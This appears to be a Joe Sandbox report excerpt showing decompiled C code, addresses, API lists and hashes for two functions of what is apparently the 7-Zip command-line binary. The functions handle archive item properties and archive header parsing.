                                                                      • Instruction ID: 9d657810adf499215ee7a9b32c8eb42b1c43bc38d34ff6ef8d600078ac3b3485
                                                                      • Opcode Fuzzy Hash: bf9c5bfcbe972eb42892c2302544a30870c7319e43138cbb240557299388031a
                                                                      • Instruction Fuzzy Hash: 86217472508300AFD310EF21D8419AFBBE4EF95719F40492EFA96A3152EA34D60DCB57
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0043B137 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 350timeCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 70%
                                                                      			E0043B137(intOrPtr __edx) {
				intOrPtr _t120;
				signed int _t121;
				signed int _t128;
				signed int _t131;
				signed int _t133;
				signed int _t146;
				intOrPtr* _t147;
				signed int _t159;
				signed char _t160;
				intOrPtr _t161;
				signed int _t164;
				intOrPtr* _t167;
				signed int _t171;
				signed int _t172;
				signed int _t175;
				signed int _t177;
				signed int _t179;
				void* _t180;
				signed int _t183;
				signed int _t184;
				int _t187;
				void* _t189;
				void* _t192;
				intOrPtr* _t193;
				void* _t196;
				void* _t197;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t206;
				signed int _t220;
				signed int _t225;
				signed int _t227;
				signed int _t228;
				signed int _t234;
				signed short _t268;
				signed char* _t271;
				void* _t274;
				void* _t276;
				void* _t279;

				_t261 = __edx;
				E0046B890(E0047860C, _t274);
				 *((intOrPtr*)(_t274 - 0x10)) = _t276 - 0x80;
				 *(_t274 - 4) = 0;
				 *((short*)(_t274 - 0x6c)) = 0;
				 *((short*)(_t274 - 0x6a)) = 0;
				 *(_t274 - 4) = 1;
				_t271 =  *( *((intOrPtr*)( *((intOrPtr*)(_t274 + 8)) + 0x1c)) +  *(_t274 + 0xc) * 4);
				_t120 =  *((intOrPtr*)(_t274 + 0x10));
				_t279 = _t120 - 0xc;
				if(_t279 > 0) {
					_t121 = _t120 - 0xf;
					__eflags = _t121;
					if(_t121 == 0) {
						_t123 = _t271[2] & 0x00000001;
						__eflags = _t271[2] & 0x00000001;
						L84:
						E0040C13B(_t274 - 0x6c, _t123);
						L85:
						E0040C2B2(_t274 - 0x6c, _t287,  *((intOrPtr*)(_t274 + 0x14)));
						 *(_t274 - 4) =  *(_t274 - 4) & 0x00000000;
						E0040C20F(_t274 - 0x6c);
						 *[fs:0x0] =  *((intOrPtr*)(_t274 - 0xc));
						return 0;
					}
					_t128 = _t121 - 4;
					__eflags = _t128;
					if(_t128 == 0) {
						__eflags = E0043B787(_t271, __edx);
						if(__eflags == 0) {
							goto L85;
						}
						_push(_t271[0xc]);
						L40:
						E0040C1A0(_t274 - 0x6c);
						goto L85;
					}
					_t131 = _t128 - 3;
					__eflags = _t131;
					if(_t131 == 0) {
						_t268 = _t271[4];
						 *((intOrPtr*)(_t274 - 0x2c)) = 0;
						 *((intOrPtr*)(_t274 - 0x28)) = 0;
						 *((intOrPtr*)(_t274 - 0x24)) = 0;
						E00401EEE(_t274 - 0x2c, 3);
						__eflags = _t271[2] & 0x00000001;
						 *(_t274 - 4) = 6;
						if((_t271[2] & 0x00000001) == 0) {
							L64:
							__eflags = _t268 - 0xb;
							if(_t268 >= 0xb) {
								L66:
								_t133 = _t268 & 0x0000ffff;
								_t220 = _t133 - 0xc;
								__eflags = _t220;
								if(_t220 == 0) {
									_push( *0x48d500);
									L78:
									E00435B13(_t274 - 0x2c, _t261);
									L79:
									E0040C0D3(_t274 - 0x6c, __eflags,  *((intOrPtr*)(_t274 - 0x2c)));
									 *(_t274 - 4) = 1;
									E00407A18( *((intOrPtr*)(_t274 - 0x2c)));
									L80:
									goto L85;
								}
								_t225 = _t220;
								__eflags = _t225;
								if(_t225 == 0) {
									E00435B13(_t274 - 0x2c, _t261,  *0x48d504);
									__eflags = _t271[2] >> 0x00000001 & 0x00000001;
									if(__eflags == 0) {
										goto L79;
									}
									_push(":EOS");
									goto L78;
								}
								_t227 = _t225 - 0x52;
								__eflags = _t227;
								if(_t227 == 0) {
									_push( *0x48d508);
								} else {
									_t228 = _t227 - 1;
									__eflags = _t228;
									if(_t228 == 0) {
										_push( *0x48d50c);
									} else {
										__eflags = _t228 == 1;
										if(_t228 == 1) {
											_push( *0x48d510);
										} else {
											asm("cdq");
											_push(_t261);
											_push(_t133);
											_t261 = 0xa;
											E004075FF(_t274 - 0x8c, _t261);
											_push(_t274 - 0x8c);
										}
									}
								}
								goto L78;
							}
							_push( *((intOrPtr*)(0x48d4d4 + (_t268 & 0x0000ffff) * 4)));
							goto L78;
						}
						__eflags = _t268 - 0x63;
						if(_t268 != 0x63) {
							__eflags = _t271[2] & 0x00000040;
							if((_t271[2] & 0x00000040) == 0) {
								_push( *0x48d518);
								L62:
								E00435B13(_t274 - 0x2c, _t261);
								L63:
								E00406ACF(_t274 - 0x2c, _t261, __eflags, 0x20);
								goto L64;
							}
							_t146 = E0043B600( &(_t271[0x68]), _t274 - 0x20);
							__eflags = _t146;
							if(_t146 == 0) {
								L60:
								_push( *0x48d51c);
								goto L62;
							}
							_t234 = 0;
							__eflags = 0;
							while(1) {
								__eflags = _t234 - 0xb;
								if(_t234 >= 0xb) {
									break;
								}
								_t261 =  *((intOrPtr*)(_t274 - 0x1e));
								_t147 = 0x48d520 + _t234 * 8;
								__eflags = _t261 -  *_t147;
								if(_t261 !=  *_t147) {
									_t234 = _t234 + 1;
									continue;
								}
								_push( *((intOrPtr*)(_t147 + 4)));
								goto L62;
							}
							__eflags = 0;
							if(0 != 0) {
								goto L63;
							}
							goto L60;
						}
						E00409664(_t274 - 0x2c,  *0x48d514);
						 *(_t274 - 0x18) = 2;
						 *(_t274 - 0x16) = 3;
						 *(_t274 - 0x14) = 0;
						__eflags = E0043B585( &(_t271[0x68]), _t274 - 0x18);
						if(__eflags == 0) {
							goto L66;
						}
						E00406ACF(_t274 - 0x2c, _t261, __eflags, 0x2d);
						asm("cdq");
						_push(_t261);
						_push(( *(_t274 - 0x16) & 0x000000ff) + 1 << 6);
						_t261 = 0xa;
						E004075FF(_t274 - 0x8c, _t261);
						E00435B13(_t274 - 0x2c, _t261, _t274 - 0x8c);
						E00406ACF(_t274 - 0x2c, _t261, __eflags, 0x20);
						_t268 =  *(_t274 - 0x14);
						goto L64;
					}
					_t159 = _t131 - 1;
					__eflags = _t159;
					if(_t159 == 0) {
						_t160 = _t271[0x41];
						__eflags = _t160 - 0x14;
						if(__eflags >= 0) {
							_t161 =  *0x48d4d0; // 0x48c5cc
						} else {
							_t161 =  *((intOrPtr*)(0x48d480 + (_t160 & 0x000000ff) * 4));
						}
						E0040C0D3(_t274 - 0x6c, __eflags, _t161);
						goto L85;
					}
					_t164 = _t159 - 5;
					__eflags = _t164;
					if(__eflags == 0) {
						_push(E0043B088(_t274 - 0x5c,  &(_t271[0x7c]), __eflags));
						_push(_t274 - 0x50);
						 *(_t274 - 4) = 4;
						_t167 = E0043B6E5(_t271, __eflags);
						 *(_t274 - 4) = 5;
						E0040C08C(_t274 - 0x6c, __eflags,  *_t167);
						E00407A18( *((intOrPtr*)(_t274 - 0x50)));
						_push( *((intOrPtr*)(_t274 - 0x5c)));
						 *(_t274 - 4) = 1;
						L20:
						E00407A18();
						goto L80;
					}
					_t171 = _t164 - 5;
					__eflags = _t171;
					if(_t171 == 0) {
						_t172 =  *_t271 & 0x000000ff;
						L14:
						_push(_t172);
						goto L40;
					}
					__eflags = _t171 - 7;
					if(__eflags != 0) {
						goto L85;
					}
					_t273 =  &(_t271[0x68]);
					_t175 = E0043B680( &(_t271[0x68]), 0, _t274 - 0x20);
					__eflags = _t175;
					if(_t175 == 0) {
						_t177 = E0043B6B2(_t273, 0, _t274 + 8);
						__eflags = _t177;
						if(_t177 == 0) {
							_push(2);
						} else {
							_push(1);
						}
					} else {
						_push(0);
					}
					goto L40;
				}
				if(_t279 == 0) {
					_t269 =  &(_t271[0x68]);
					_t179 = E0043B680( &(_t271[0x68]), 0, _t274 - 0x18);
					__eflags = _t179;
					if(_t179 != 0) {
						L27:
						_t180 = _t274 - 0x18;
						L28:
						E0040C1E7(_t274 - 0x6c, _t180);
						goto L85;
					}
					_t183 = E0043B6B2(_t269, 0, _t274 + 8);
					__eflags = _t183;
					if(_t183 == 0) {
						_t184 = E0040C677(_t271[8], _t274 - 0x20);
						__eflags = _t184;
						if(_t184 == 0) {
							L26:
							 *(_t274 - 0x18) = 0;
							 *(_t274 - 0x14) = 0;
							goto L27;
						}
						_t187 = LocalFileTimeToFileTime(_t274 - 0x20, _t274 - 0x18);
						__eflags = _t187;
						if(_t187 != 0) {
							goto L27;
						}
						goto L26;
					}
					E0040C6D5( *((intOrPtr*)(_t274 + 8)), _t274 - 0x18);
					goto L27;
				}
				_t189 = _t120 - 3;
				if(_t189 == 0) {
					_push( &(_t271[0x20]));
					_push(_t274 - 0x44);
					_t192 = E0043B6E5(_t271, __eflags);
					 *(_t274 - 4) = 2;
					_t193 = E00425EBC(_t274 - 0x38, _t192);
					 *(_t274 - 4) = 3;
					E0040C08C(_t274 - 0x6c, __eflags,  *_t193);
					E00407A18( *((intOrPtr*)(_t274 - 0x38)));
					_push( *((intOrPtr*)(_t274 - 0x44)));
					 *(_t274 - 4) = 1;
					goto L20;
				}
				_t196 = _t189 - 3;
				if(_t196 == 0) {
					_t123 = E00440593(_t271);
					goto L84;
				}
				_t197 = _t196 - 1;
				if(_t197 == 0) {
					_push(_t271[0x1c]);
					_push(_t271[0x18]);
					L16:
					E0040C1C0(_t274 - 0x6c);
					goto L85;
				}
				_t199 = _t197 - 1;
				if(_t199 == 0) {
					_push(_t271[0x14]);
					_push(_t271[0x10]);
					goto L16;
				}
				_t200 = _t199 - 1;
				if(_t200 == 0) {
					_t172 = E0044062B(_t271);
					goto L14;
				}
				_t201 = _t200 - 1;
				if(_t201 == 0) {
					__eflags = E0043B680( &(_t271[0x68]), 2, _t274 - 0x18);
					if(__eflags == 0) {
						goto L85;
					} else {
						_t180 = _t274 - 0x18;
						goto L28;
					}
				}
				if(_t201 != 1) {
					goto L85;
				}
				_t206 = E0043B680( &(_t271[0x68]), 1, _t274 - 0x18);
				_t287 = _t206;
				if(_t206 == 0) {
					goto L85;
				} else {
					_t180 = _t274 - 0x18;
					goto L28;
				}
			}











































                                                                      0x0043b137
                                                                      0x0043b13c
                                                                      0x0043b14c
                                                                      0x0043b14f
                                                                      0x0043b152
                                                                      0x0043b156
                                                                      0x0043b160
                                                                      0x0043b167
                                                                      0x0043b16a
                                                                      0x0043b16d
                                                                      0x0043b170
                                                                      0x0043b2ba
                                                                      0x0043b2ba
                                                                      0x0043b2bd
                                                                      0x0043b543
                                                                      0x0043b543
                                                                      0x0043b545
                                                                      0x0043b549
                                                                      0x0043b54e
                                                                      0x0043b554
                                                                      0x0043b559
                                                                      0x0043b560
                                                                      0x0043b579
                                                                      0x0043b582
                                                                      0x0043b582
                                                                      0x0043b2c3
                                                                      0x0043b2c3
                                                                      0x0043b2c6
                                                                      0x0043b534
                                                                      0x0043b536
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043b538
                                                                      0x0043b317
                                                                      0x0043b31a
                                                                      0x00000000
                                                                      0x0043b31a
                                                                      0x0043b2cc
                                                                      0x0043b2cc
                                                                      0x0043b2cf
                                                                      0x0043b393
                                                                      0x0043b39c
                                                                      0x0043b39f
                                                                      0x0043b3a2
                                                                      0x0043b3a5
                                                                      0x0043b3aa
                                                                      0x0043b3ae
                                                                      0x0043b3b2
                                                                      0x0043b48a
                                                                      0x0043b48a
                                                                      0x0043b48e
                                                                      0x0043b49c
                                                                      0x0043b49c
                                                                      0x0043b4a1
                                                                      0x0043b4a1
                                                                      0x0043b4a4
                                                                      0x0043b505
                                                                      0x0043b50b
                                                                      0x0043b50e
                                                                      0x0043b513
                                                                      0x0043b519
                                                                      0x0043b521
                                                                      0x0043b525
                                                                      0x0043b52a
                                                                      0x00000000
                                                                      0x0043b52a
                                                                      0x0043b4a7
                                                                      0x0043b4a7
                                                                      0x0043b4a8
                                                                      0x0043b4f0
                                                                      0x0043b4fa
                                                                      0x0043b4fc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043b4fe
                                                                      0x00000000
                                                                      0x0043b4fe
                                                                      0x0043b4aa
                                                                      0x0043b4aa
                                                                      0x0043b4ad
                                                                      0x0043b4df
                                                                      0x0043b4af
                                                                      0x0043b4af
                                                                      0x0043b4af
                                                                      0x0043b4b0
                                                                      0x0043b4d7
                                                                      0x0043b4b2
                                                                      0x0043b4b2
                                                                      0x0043b4b3
                                                                      0x0043b4cf
                                                                      0x0043b4b5
                                                                      0x0043b4b5
                                                                      0x0043b4b6
                                                                      0x0043b4b7
                                                                      0x0043b4c0
                                                                      0x0043b4c1
                                                                      0x0043b4cc
                                                                      0x0043b4cc
                                                                      0x0043b4b3
                                                                      0x0043b4b0
                                                                      0x00000000
                                                                      0x0043b4ad
                                                                      0x0043b493
                                                                      0x00000000
                                                                      0x0043b493
                                                                      0x0043b3b8
                                                                      0x0043b3bc
                                                                      0x0043b42f
                                                                      0x0043b433
                                                                      0x0043b472
                                                                      0x0043b478
                                                                      0x0043b47b
                                                                      0x0043b480
                                                                      0x0043b485
                                                                      0x00000000
                                                                      0x0043b485
                                                                      0x0043b43e
                                                                      0x0043b443
                                                                      0x0043b445
                                                                      0x0043b46a
                                                                      0x0043b46a
                                                                      0x00000000
                                                                      0x0043b46a
                                                                      0x0043b447
                                                                      0x0043b447
                                                                      0x0043b449
                                                                      0x0043b449
                                                                      0x0043b44c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043b44e
                                                                      0x0043b452
                                                                      0x0043b459
                                                                      0x0043b45c
                                                                      0x0043b463
                                                                      0x00000000
                                                                      0x0043b463
                                                                      0x0043b45e
                                                                      0x00000000
                                                                      0x0043b45e
                                                                      0x0043b466
                                                                      0x0043b468
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043b468
                                                                      0x0043b3c7
                                                                      0x0043b3d3
                                                                      0x0043b3d9
                                                                      0x0043b3dd
                                                                      0x0043b3e6
                                                                      0x0043b3e8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043b3f3
                                                                      0x0043b406
                                                                      0x0043b407
                                                                      0x0043b408
                                                                      0x0043b40b
                                                                      0x0043b40c
                                                                      0x0043b41b
                                                                      0x0043b425
                                                                      0x0043b42a
                                                                      0x00000000
                                                                      0x0043b42a
                                                                      0x0043b2d5
                                                                      0x0043b2d5
                                                                      0x0043b2d6
                                                                      0x0043b36d
                                                                      0x0043b370
                                                                      0x0043b372
                                                                      0x0043b380
                                                                      0x0043b374
                                                                      0x0043b377
                                                                      0x0043b377
                                                                      0x0043b389
                                                                      0x00000000
                                                                      0x0043b389
                                                                      0x0043b2dc
                                                                      0x0043b2dc
                                                                      0x0043b2df
                                                                      0x0043b33b
                                                                      0x0043b33f
                                                                      0x0043b342
                                                                      0x0043b346
                                                                      0x0043b350
                                                                      0x0043b354
                                                                      0x0043b35c
                                                                      0x0043b361
                                                                      0x0043b364
                                                                      0x0043b247
                                                                      0x0043b247
                                                                      0x00000000
                                                                      0x0043b24c
                                                                      0x0043b2e1
                                                                      0x0043b2e1
                                                                      0x0043b2e4
                                                                      0x0043b328
                                                                      0x0043b1e0
                                                                      0x0043b1e0
                                                                      0x00000000
                                                                      0x0043b1e0
                                                                      0x0043b2e6
                                                                      0x0043b2e9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043b2f2
                                                                      0x0043b2f9
                                                                      0x0043b2fe
                                                                      0x0043b300
                                                                      0x0043b30c
                                                                      0x0043b311
                                                                      0x0043b313
                                                                      0x0043b324
                                                                      0x0043b315
                                                                      0x0043b315
                                                                      0x0043b315
                                                                      0x0043b302
                                                                      0x0043b302
                                                                      0x0043b302
                                                                      0x00000000
                                                                      0x0043b300
                                                                      0x0043b176
                                                                      0x0043b255
                                                                      0x0043b25c
                                                                      0x0043b261
                                                                      0x0043b263
                                                                      0x0043b2a9
                                                                      0x0043b2a9
                                                                      0x0043b2ac
                                                                      0x0043b2b0
                                                                      0x00000000
                                                                      0x0043b2b0
                                                                      0x0043b26c
                                                                      0x0043b271
                                                                      0x0043b273
                                                                      0x0043b288
                                                                      0x0043b28d
                                                                      0x0043b28f
                                                                      0x0043b2a3
                                                                      0x0043b2a3
                                                                      0x0043b2a6
                                                                      0x00000000
                                                                      0x0043b2a6
                                                                      0x0043b299
                                                                      0x0043b29f
                                                                      0x0043b2a1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043b2a1
                                                                      0x0043b27b
                                                                      0x00000000
                                                                      0x0043b27b
                                                                      0x0043b17c
                                                                      0x0043b17f
                                                                      0x0043b212
                                                                      0x0043b216
                                                                      0x0043b217
                                                                      0x0043b221
                                                                      0x0043b225
                                                                      0x0043b22f
                                                                      0x0043b233
                                                                      0x0043b23b
                                                                      0x0043b240
                                                                      0x0043b243
                                                                      0x00000000
                                                                      0x0043b243
                                                                      0x0043b185
                                                                      0x0043b188
                                                                      0x0043b203
                                                                      0x00000000
                                                                      0x0043b203
                                                                      0x0043b18a
                                                                      0x0043b18b
                                                                      0x0043b1f9
                                                                      0x0043b1fc
                                                                      0x0043b1ec
                                                                      0x0043b1ef
                                                                      0x00000000
                                                                      0x0043b1ef
                                                                      0x0043b18d
                                                                      0x0043b18e
                                                                      0x0043b1e6
                                                                      0x0043b1e9
                                                                      0x00000000
                                                                      0x0043b1e9
                                                                      0x0043b190
                                                                      0x0043b191
                                                                      0x0043b1db
                                                                      0x00000000
                                                                      0x0043b1db
                                                                      0x0043b193
                                                                      0x0043b194
                                                                      0x0043b1c9
                                                                      0x0043b1cb
                                                                      0x00000000
                                                                      0x0043b1d1
                                                                      0x0043b1d1
                                                                      0x00000000
                                                                      0x0043b1d1
                                                                      0x0043b1cb
                                                                      0x0043b197
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043b1a6
                                                                      0x0043b1ab
                                                                      0x0043b1ad
                                                                      0x00000000
                                                                      0x0043b1b3
                                                                      0x0043b1b3
                                                                      0x00000000
                                                                      0x0043b1b3

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 0043B13C
                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?,00000000,?,00000000,?), ref: 0043B299
                                                                        • Part of subcall function 004075FF: __aullrem.LIBCMT ref: 00407628
                                                                        • Part of subcall function 004075FF: __aulldiv.LIBCMT ref: 00407647
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: FileTime$H_prologLocal__aulldiv__aullrem
                                                                      • String ID: :EOS
                                                                      • API String ID: 2778661161-1291901814
                                                                      • Opcode ID: 2354e7ec4c2b8d6c968416e40d9aa08ba06bc91753a3a1e5fe7f369bb66e9801
                                                                      • Instruction ID: 5c88e5fc1e14b78c74474c3f3572503d3b72a76114a3bd06a3995ebb801c467b
                                                                      • Opcode Fuzzy Hash: 2354e7ec4c2b8d6c968416e40d9aa08ba06bc91753a3a1e5fe7f369bb66e9801
                                                                      • Instruction Fuzzy Hash: 31C1A530900209EACF15EFA5C851BFEB779EF18308F14541FE64267292DB389A05DBAD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0042D5F3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 189COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 98%
                                                                      			E0042D5F3(void* __ecx, signed int __edx) {
				intOrPtr _t110;
				intOrPtr _t117;
				intOrPtr* _t118;
				void* _t122;
				signed int _t128;
				signed int _t132;
				signed int _t135;
				signed int _t139;
				intOrPtr _t148;
				signed int _t173;
				intOrPtr _t174;
				intOrPtr _t176;
				void* _t177;
				signed int _t178;
				void* _t179;
				signed int* _t182;
				void* _t184;
				void* _t186;
				void* _t187;

				_t173 = __edx;
				E0046B890(E004774E4, _t187);
				_t184 = __ecx;
				_t110 = E0042D241(__edx);
				_t148 =  *((intOrPtr*)(_t187 + 8));
				_t176 = _t110;
				E0040862D();
				E0040867E(_t148, _t176);
				 *(_t187 - 0x10) =  *(_t187 - 0x10) & 0x00000000;
				 *(_t187 - 0x1c) =  *(_t187 - 0x1c) & 0x00000000;
				if(_t176 <= 0) {
					L15:
					_t177 = _t148 + 0x14;
					 *((intOrPtr*)(_t187 + 8)) =  *(_t187 - 0x1c) - 1;
					E0040862D();
					_t155 = _t177;
					E0040867E(_t177,  *((intOrPtr*)(_t187 + 8)));
					_t117 =  *((intOrPtr*)(_t187 + 8));
					if(_t117 <= 0) {
						L18:
						_t178 =  *(_t187 - 0x10);
						if(_t178 <  *((intOrPtr*)(_t187 + 8))) {
							E0042D0F8(_t155);
						}
						_t179 = _t178 -  *((intOrPtr*)(_t187 + 8));
						_t156 = _t148 + 0x28;
						 *((intOrPtr*)(_t187 + 8)) = _t156;
						_t118 = E0040867E(_t156, _t179);
						if(_t179 != 1) {
							if(_t179 <= 0) {
								goto L36;
							} else {
								goto L35;
							}
							do {
								L35:
								_t118 = E00415C6D( *((intOrPtr*)(_t187 + 8)), E0042D241(_t173));
								_t179 = _t179 - 1;
							} while (_t179 != 0);
							goto L36;
						} else {
							_t186 = 0;
							if( *(_t187 - 0x10) <= 0) {
								L32:
								if( *((intOrPtr*)(_t148 + 0x30)) != 1) {
									_t118 = E0042D0F8(_t156);
								}
								L36:
								 *[fs:0x0] =  *((intOrPtr*)(_t187 - 0xc));
								return _t118;
							}
							_t174 =  *((intOrPtr*)(_t148 + 0x1c));
							do {
								if(_t174 <= 0) {
									L27:
									_t156 = 0xffffffff;
									L28:
									if(_t156 < 0) {
										_t156 =  *((intOrPtr*)(_t187 + 8));
										_t118 = E00415C6D( *((intOrPtr*)(_t187 + 8)), _t186);
										goto L32;
									}
									goto L29;
								}
								_t118 =  *((intOrPtr*)(_t148 + 0x20));
								while( *_t118 != _t186) {
									_t156 = 1;
									_t118 = _t118 + 8;
									if(1 < _t174) {
										continue;
									}
									goto L27;
								}
								goto L28;
								L29:
								_t186 = _t186 + 1;
							} while (_t186 <  *(_t187 - 0x10));
							goto L32;
						}
					}
					 *((intOrPtr*)(_t187 - 0x24)) = _t117;
					do {
						 *(_t187 - 0x2c) = E0042D241(_t173);
						_t122 = E0042D241(_t173);
						_t155 = _t177;
						E0042389F(_t177,  *(_t187 - 0x2c), _t122);
						_t92 = _t187 - 0x24;
						 *_t92 =  *((intOrPtr*)(_t187 - 0x24)) - 1;
					} while ( *_t92 != 0);
					goto L18;
				}
				 *((intOrPtr*)(_t187 - 0x24)) = _t176;
				do {
					 *(_t187 - 0x50) =  *(_t187 - 0x50) & 0x00000000;
					 *(_t187 - 0x4c) =  *(_t187 - 0x4c) & 0x00000000;
					 *((intOrPtr*)(_t187 - 0x54)) = 0x47a7ec;
					 *(_t187 - 4) =  *(_t187 - 4) & 0x00000000;
					_push(_t187 - 0x5c);
					E00428C94(_t148);
					 *(_t187 - 4) =  *(_t187 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t187 - 0x54)) = 0x47a7ec;
					E00407A18( *(_t187 - 0x4c));
					_t182 =  *( *((intOrPtr*)(_t148 + 0xc)) +  *(_t148 + 8) * 4 - 4);
					_t128 = E0042D110( *((intOrPtr*)(_t184 + 0x18)));
					_t167 =  *((intOrPtr*)(_t184 + 0x18));
					 *(_t187 + 0xb) = _t128;
					 *(_t187 - 0x14) = _t128 & 0x0000000f;
					E0042D12E( *((intOrPtr*)(_t184 + 0x18)), _t187 - 0x3c, _t128 & 0x0000000f);
					_t132 =  *(_t187 - 0x14);
					if(_t132 > 8) {
						E0042D0F8(_t167);
						_t132 =  *(_t187 - 0x14);
					}
					_t168 = 0;
					 *(_t187 - 0x2c) = 0;
					 *(_t187 - 0x28) = 0;
					if(_t132 > 0) {
						 *((intOrPtr*)(_t187 - 0x18)) = 0;
						 *(_t187 - 0x14) = _t187 + _t132 - 0x3d;
						 *(_t187 - 0x20) = _t132;
						do {
							_t168 =  *((intOrPtr*)(_t187 - 0x18));
							asm("cdq");
							 *(_t187 - 0x2c) =  *(_t187 - 0x2c) | E0046C5A0( *( *(_t187 - 0x14)) & 0x000000ff,  *((intOrPtr*)(_t187 - 0x18)), _t173);
							 *(_t187 - 0x28) =  *(_t187 - 0x28) | _t173;
							 *(_t187 - 0x14) =  *(_t187 - 0x14) - 1;
							 *((intOrPtr*)(_t187 - 0x18)) =  *((intOrPtr*)(_t187 - 0x18)) + 8;
							_t49 = _t187 - 0x20;
							 *_t49 =  *(_t187 - 0x20) - 1;
						} while ( *_t49 != 0);
					}
					 *_t182 =  *(_t187 - 0x2c);
					_t182[1] =  *(_t187 - 0x28);
					if(( *(_t187 + 0xb) & 0x00000010) == 0) {
						_t135 = 1;
						_t182[5] = _t135;
					} else {
						_t182[5] = E0042D241(_t173);
						_t168 =  *((intOrPtr*)(_t184 + 0x18));
						_t135 = E0042D241(_t173);
					}
					_t182[6] = _t135;
					if(( *(_t187 + 0xb) & 0x00000020) != 0) {
						_t139 = E0042D241(_t173);
						_t66 =  &(_t182[2]); // 0x107
						 *(_t187 - 0x20) = _t139;
						E0040FA26(_t66, _t139);
						_t168 =  *((intOrPtr*)(_t184 + 0x18));
						E0042D12E( *((intOrPtr*)(_t184 + 0x18)), _t182[4],  *(_t187 - 0x20));
					}
					if(( *(_t187 + 0xb) & 0x00000080) != 0) {
						E0042D0F8(_t168);
					}
					 *(_t187 - 0x10) =  *(_t187 - 0x10) + _t182[5];
					 *(_t187 - 0x1c) =  *(_t187 - 0x1c) + _t182[6];
					_t80 = _t187 - 0x24;
					 *_t80 =  *((intOrPtr*)(_t187 - 0x24)) - 1;
				} while ( *_t80 != 0);
				goto L15;
			}






















                                                                      0x0042d5f3
                                                                      0x0042d5f8
                                                                      0x0042d602
                                                                      0x0042d608
                                                                      0x0042d60d
                                                                      0x0042d610
                                                                      0x0042d614
                                                                      0x0042d61c
                                                                      0x0042d621
                                                                      0x0042d625
                                                                      0x0042d62b
                                                                      0x0042d74c
                                                                      0x0042d74f
                                                                      0x0042d755
                                                                      0x0042d758
                                                                      0x0042d760
                                                                      0x0042d762
                                                                      0x0042d767
                                                                      0x0042d76c
                                                                      0x0042d794
                                                                      0x0042d794
                                                                      0x0042d79a
                                                                      0x0042d79c
                                                                      0x0042d79c
                                                                      0x0042d7a1
                                                                      0x0042d7a4
                                                                      0x0042d7a7
                                                                      0x0042d7ab
                                                                      0x0042d7b3
                                                                      0x0042d7fb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042d7fd
                                                                      0x0042d7fd
                                                                      0x0042d809
                                                                      0x0042d80e
                                                                      0x0042d80e
                                                                      0x00000000
                                                                      0x0042d7b5
                                                                      0x0042d7b5
                                                                      0x0042d7ba
                                                                      0x0042d7ec
                                                                      0x0042d7f0
                                                                      0x0042d7f2
                                                                      0x0042d7f2
                                                                      0x0042d811
                                                                      0x0042d817
                                                                      0x0042d81f
                                                                      0x0042d81f
                                                                      0x0042d7bc
                                                                      0x0042d7bf
                                                                      0x0042d7c3
                                                                      0x0042d7d4
                                                                      0x0042d7d4
                                                                      0x0042d7d7
                                                                      0x0042d7d9
                                                                      0x0042d7e3
                                                                      0x0042d7e7
                                                                      0x00000000
                                                                      0x0042d7e7
                                                                      0x00000000
                                                                      0x0042d7d9
                                                                      0x0042d7c5
                                                                      0x0042d7c8
                                                                      0x0042d7cc
                                                                      0x0042d7cd
                                                                      0x0042d7d2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042d7d2
                                                                      0x00000000
                                                                      0x0042d7db
                                                                      0x0042d7db
                                                                      0x0042d7dc
                                                                      0x00000000
                                                                      0x0042d7e1
                                                                      0x0042d7b3
                                                                      0x0042d76e
                                                                      0x0042d771
                                                                      0x0042d77c
                                                                      0x0042d77f
                                                                      0x0042d785
                                                                      0x0042d78a
                                                                      0x0042d78f
                                                                      0x0042d78f
                                                                      0x0042d78f
                                                                      0x00000000
                                                                      0x0042d771
                                                                      0x0042d631
                                                                      0x0042d634
                                                                      0x0042d634
                                                                      0x0042d638
                                                                      0x0042d641
                                                                      0x0042d644
                                                                      0x0042d64b
                                                                      0x0042d64e
                                                                      0x0042d656
                                                                      0x0042d65a
                                                                      0x0042d65d
                                                                      0x0042d669
                                                                      0x0042d670
                                                                      0x0042d675
                                                                      0x0042d678
                                                                      0x0042d67e
                                                                      0x0042d686
                                                                      0x0042d68b
                                                                      0x0042d691
                                                                      0x0042d693
                                                                      0x0042d698
                                                                      0x0042d698
